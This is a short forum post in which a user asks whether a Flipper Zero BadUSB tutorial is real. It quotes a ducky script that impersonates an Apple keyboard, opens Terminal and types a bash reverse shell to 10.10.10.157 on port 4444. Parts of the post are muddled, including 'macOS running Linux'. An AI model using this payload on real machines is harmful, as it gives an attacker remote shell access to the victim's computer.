Recently, I saw a post about a person who uses the Flipper to test for potential weaknesses in their workplace. They basically posted a tutorial on how to make a reverse shell on a macOS running Linux. The code was fairly simple and didn’t seem real. You can see the code here, but can someone debunk this? I will also link the post for instructions. I can’t try it just yet, since my Flipper is currently arriving in the mail.
/* Flipper Zero ducky commands for *
*backdoor exploits in macOS *
using reverse shells */
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
/* Replace text on “STRINGbash” lower command with I.P. for mac (10.10.10.157) and replace upper command with port (4444) */
The original post can be viewed here
Or, if you don’t trust hyperlinks, here ---------> How to Get a Reverse Shell on macOS Using A Flipper Zero as a BadUSB | HackerNoon